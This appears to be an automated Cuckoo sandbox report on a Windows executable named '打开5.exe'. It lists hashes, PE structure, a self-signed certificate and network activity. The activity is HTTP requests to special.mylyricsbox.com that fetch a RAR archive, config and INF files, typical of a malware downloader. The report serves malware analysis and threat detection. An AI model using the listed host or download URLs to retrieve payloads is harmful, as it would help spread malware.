Analysis type | VM tag | Start time | End time | Duration |
---|---|---|---|---|
File (Windows) | win7-sp1-x64-shaapp03-1 | 2024-04-22 17:34:29 | 2024-04-22 17:35:10 | 41 seconds |
File name | 打开5.exe |
---|---|
File size | 437248 bytes |
File type | PE32+ executable (GUI) x86-64, for MS Windows |
MD5 | 2e2773be6cbe4ff7a1683e4621df5255 |
SHA1 | c9705f5596a56e88cfb2205dd13fd56dc674c40c |
SHA256 | 0d859be750ef8d175f671654f30e9afddfccd512fb8acf4b151939d5a3c05db8 |
SHA512 | 90ec6f256fd04c5fa39d0cb8c8b72f4b51394621cfa212d5a1df66a1597df26a1617739f819ba555f335d88f9522466e4404496c136a09d797165d56a983fab3 |
CRC32 | A19C6846 |
Ssdeep | 6144:cSCOeIKcleyZpnEkNmn8zEHcff10UU8BdGQxJCMj:cSCOVLvXEk4n8IHMfyG4OJZ |
Direct | IP | Security rating | Geolocation |
---|---|---|---|
No | 149.129.12.38 | | Malaysia |
Domain | Security rating | Response |
---|---|---|
special.mylyricsbox.com | Unknown | A 149.129.12.38 CNAME outhook.oss-ap-northeast-2.aliyuncs.com |
Image base | 0x00400000 |
---|---|
Entry point | 0x0040beb0 |
Declared checksum | 0x0007313a |
Actual checksum | 0x0007313a |
Minimum OS version required | 4.0 |
PDB path | c:\Users\86130\Desktop\00\x64\release\00.pdb |
Compile time | 2024-04-11 11:59:16 |
Import hash | ed05db898e2d3a03abc3f211d0ebda5b |
Icon | |
Icon exact hash | e8f2bc5505598bcaa2ca3d5e277057c5 |
Icon similarity hash | 97b9e1cb20abc6171ea88a91083ca6fa |
LegalCopyright | |
---|---|
FileVersion | |
CompanyName | |
ProductName | |
ProductVersion | |
FileDescription | |
OriginalFilename | |
Translation | |
SHA1 | Timestamp | Validity | Error |
---|---|---|---|
None | Mon Apr 22 14:24:01 2024 | | A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider. |
Certificate chain | Certificate Chain 1 |
---|---|
Issued to | andy |
Issuer | andy |
Valid until | Sun Jan 01 075959 2040 |
SHA1 hash | 4e0e0162dbba961596a17b102c26c04d7c853811 |
Certificate chain | Timestamp Chain 1 |
Issued to | GlobalSign |
Issuer | GlobalSign |
Valid until | Sun Dec 10 080000 2034 |
SHA1 hash | 8094640eb5a7a1ca119c1fddd59f810263a7fbd1 |
Certificate chain | Timestamp Chain 2 |
Issued to | GlobalSign Timestamping CA - SHA384 - G4 |
Issuer | GlobalSign |
Valid until | Sun Dec 10 080000 2034 |
SHA1 hash | f585500925786f88e721d235240a2452ae3d23f9 |
Certificate chain | Timestamp Chain 3 |
Issued to | Globalsign TSA for Advanced - G4 - 202311 |
Issuer | GlobalSign Timestamping CA - SHA384 - G4 |
Valid until | Mon Dec 04 183002 2034 |
SHA1 hash | e201ff2bd75afdf8bc0c2c1b51bd58f8631d38b6 |
Name | Virtual address | Virtual size | Raw data size | Characteristics | Entropy |
---|---|---|---|---|---|
.text | 0x00001000 | 0x0001423a | 0x00014400 | IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ | 5.96 |
.rdata | 0x00016000 | 0x00006060 | 0x00006200 | IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ | 4.77 |
.data | 0x0001d000 | 0x00002458 | 0x00001400 | IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE | 2.08 |
.pdata | 0x00020000 | 0x00001b30 | 0x00001c00 | IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ | 4.65 |
.rsrc | 0x00022000 | 0x0004b4cc | 0x0004b600 | IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ | 5.88 |
Offset | 0x00069000 |
---|---|
Size | 0x00001c00 |

Name | Offset | Size | Language | Sublanguage | Entropy | File type |
---|---|---|---|---|---|---|
RT_ICON | 0x0006c8a4 | 0x00000468 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 4.06 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0006c8a4 | 0x00000468 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 4.06 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0006c8a4 | 0x00000468 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 4.06 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0006c8a4 | 0x00000468 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 4.06 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0006c8a4 | 0x00000468 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 4.06 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0006c8a4 | 0x00000468 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 4.06 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0006c8a4 | 0x00000468 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 4.06 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0006c8a4 | 0x00000468 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 4.06 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0006c8a4 | 0x00000468 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 4.06 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0006c8a4 | 0x00000468 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 4.06 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0006c8a4 | 0x00000468 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 4.06 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0006c8a4 | 0x00000468 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 4.06 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0006c8a4 | 0x00000468 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 4.06 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0006c8a4 | 0x00000468 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 4.06 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0006c8a4 | 0x00000468 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 4.06 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0006c8a4 | 0x00000468 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 4.06 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0006c8a4 | 0x00000468 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 4.06 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0006c8a4 | 0x00000468 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 4.06 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0006c8a4 | 0x00000468 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 4.06 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0006c8a4 | 0x00000468 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 4.06 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0006c8a4 | 0x00000468 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 4.06 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0006c8a4 | 0x00000468 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 4.06 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0006c8a4 | 0x00000468 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 4.06 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0006c8a4 | 0x00000468 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 4.06 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0006c8a4 | 0x00000468 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 4.06 | GLS_BINARY_LSB_FIRST |
RT_MENU | 0x0006cd0c | 0x00000050 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 3.25 | data |
RT_DIALOG | 0x0006cd5c | 0x000000be | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 3.57 | data |
RT_STRING | 0x0006ce1c | 0x0000002c | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 1.05 | data |
RT_ACCELERATOR | 0x0006ce48 | 0x00000010 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 1.80 | data |
RT_GROUP_ICON | 0x0006cf54 | 0x00000076 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 2.89 | MS Windows icon resource - 8 icons, 32x32, 16 colors |
RT_GROUP_ICON | 0x0006cf54 | 0x00000076 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 2.89 | MS Windows icon resource - 8 icons, 32x32, 16 colors |
RT_GROUP_ICON | 0x0006cf54 | 0x00000076 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 2.89 | MS Windows icon resource - 8 icons, 32x32, 16 colors |
RT_VERSION | 0x0006cfcc | 0x00000330 | LANG_NEUTRAL | SUBLANG_NEUTRAL | 3.45 | data |
RT_MANIFEST | 0x0006d2fc | 0x000001cd | LANG_ENGLISH | SUBLANG_ENGLISH_US | 4.78 | ASCII text |
Source address | Source port | Destination address | Destination port |
---|---|---|---|
192.168.122.201 | 49161 | 149.129.12.38 special.mylyricsbox.com | 80 |
192.168.122.201 | 49162 | 149.129.12.38 special.mylyricsbox.com | 80 |
192.168.122.201 | 49160 | 23.209.84.72 | 80 |
Source address | Source port | Destination address | Destination port |
---|---|---|---|
192.168.122.201 | 56270 | 192.168.122.1 | 53 |
192.168.122.201 | 59401 | 192.168.122.1 | 53 |
URI | HTTP data |
---|---|
http://acroipm.adobe.com/11/rdr/CHS/win/nooem/none/message.zip | GET /11/rdr/CHS/win/nooem/none/message.zip HTTP/1.1 Accept: */* If-Modified-Since: Mon, 08 Nov 2017 08:44:36 GMT User-Agent: IPM Host: acroipm.adobe.com Connection: Keep-Alive Cache-Control: no-cache |
http://special.mylyricsbox.com/longlingqian.rar | GET /longlingqian.rar HTTP/1.1 User-Agent: 66df1234 Host: special.mylyricsbox.com Cache-Control: no-cache |
http://special.mylyricsbox.com/output.log | GET /output.log HTTP/1.1 User-Agent: MyApp Host: special.mylyricsbox.com Cache-Control: no-cache |
http://special.mylyricsbox.com/config.ini | GET /config.ini HTTP/1.1 User-Agent: MyApp Host: special.mylyricsbox.com Cache-Control: no-cache |
http://special.mylyricsbox.com/tdIdd.inf | GET /tdIdd.inf HTTP/1.1 User-Agent: MyApp Host: special.mylyricsbox.com Cache-Control: no-cache |
No SMTP traffic.
No IRC requests.
No ICMP traffic.
No CIF results.
No alerts.
No TLS.
No Suricata HTTP.
Task ID | 744211 |
---|---|
Mongo ID | 66262fc57e769a7ecd4b4ed3 |
Cuckoo release | 1.4-Maldun |